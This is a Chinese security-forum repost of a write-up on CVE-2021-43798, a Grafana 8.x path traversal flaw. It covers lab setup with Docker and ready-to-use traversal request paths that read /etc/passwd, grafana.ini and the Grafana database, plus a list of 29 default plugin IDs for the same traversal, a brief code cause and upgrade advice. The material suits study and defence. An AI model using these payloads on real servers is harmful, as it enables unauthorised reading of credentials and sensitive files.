设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 CVE-2021-43798:Grafana任意文件读取漏洞
返回列表 发新帖
查看: 2564|回复: 0

CVE-2021-43798:Grafana任意文件读取漏洞

[复制链接]
gclome

991

主题

1063

帖子

4319

积分

论坛元老

Rank: 8Rank: 8

积分
4319
发表于 2022-2-20 11:13:24 | 显示全部楼层 |阅读模式
原文链接:CVE-2021-43798:Grafana任意文件读取漏洞


0x01 简介
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

0x02 漏洞概述

编号:CVE-2021-43798
未授权的攻击者利用该漏洞,能够获取服务器敏感文件。

0x03 影响版本

Grafana 8.0.0 - 8.3.0

0x04 环境搭建

docker pull grafana/grafana:8.2.6
docker run -p 3000:3000 grafana/grafana:8.2.6
访问3000端口即可

0x05 漏洞复现

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd

gettingstarted是插件ID,Grafana默认安装的就有。也可以改成别的插件ID
读取Grafana配置文件
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini

读取Grafana数据库
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db

其他师傅fuzz的插件清单
https://github.com/jas502n/Grafana-VulnTips/blob/main/README.md
  1. /public/plugins/alertGroups/../../../../../../../../etc/passwd
  2. /public/plugins/alertlist/../../../../../../../../etc/passwd
  3. /public/plugins/annolist/../../../../../../../../etc/passwd
  4. /public/plugins/barchart/../../../../../../../../etc/passwd
  5. /public/plugins/bargauge/../../../../../../../../etc/passwd
  6. /public/plugins/canvas/../../../../../../../../etc/passwd
  7. /public/plugins/dashlist/../../../../../../../../etc/passwd
  8. /public/plugins/debug/../../../../../../../../etc/passwd
  9. /public/plugins/gauge/../../../../../../../../etc/passwd
  10. /public/plugins/geomap/../../../../../../../../etc/passwd
  11. /public/plugins/gettingstarted/../../../../../../../../etc/passwd
  12. /public/plugins/graph/../../../../../../../../etc/passwd
  13. /public/plugins/heatmap/../../../../../../../../etc/passwd
  14. /public/plugins/histogram/../../../../../../../../etc/passwd
  15. /public/plugins/live/../../../../../../../../etc/passwd
  16. /public/plugins/logs/../../../../../../../../etc/passwd
  17. /public/plugins/news/../../../../../../../../etc/passwd
  18. /public/plugins/nodeGraph/../../../../../../../../etc/passwd
  19. /public/plugins/piechart/../../../../../../../../etc/passwd
  20. /public/plugins/pluginlist/../../../../../../../../etc/passwd
  21. /public/plugins/stat/../../../../../../../../etc/passwd
  22. /public/plugins/state-timeline/../../../../../../../../etc/passwd
  23. /public/plugins/status-history/../../../../../../../../etc/passwd
  24. /public/plugins/table/../../../../../../../../etc/passwd
  25. /public/plugins/table-old/../../../../../../../../etc/passwd
  26. /public/plugins/text/../../../../../../../../etc/passwd
  27. /public/plugins/timeseries/../../../../../../../../etc/passwd
  28. /public/plugins/welcome/../../../../../../../../etc/passwd
  29. /public/plugins/xychart/../../../../../../../../etc/passwd
复制代码

0x06 漏洞分析
路由从这里进入

在plugins.go的getPluginAssets函数中,获取用户传入的pluginId后,如果存在,则拼接插件目录和用户传入参数。未进行任何过滤,便直接返回

pluginId可以在这里看到。随便点个插件抓个包请求路径中就包含pluginId。这些插件是默认安装的,所以实际利用时不需要登录后查看

0x07 修复方式

请升级至最新版本:
https://github.com/grafana/grafana

参考链接:https://nvd.nist.gov/vuln/detail/CVE-2021-43798   
https://github.com/jas502n/Grafana-VulnTips/blob/main/README.md


回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-5-18 00:56 , Processed in 0.014108 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表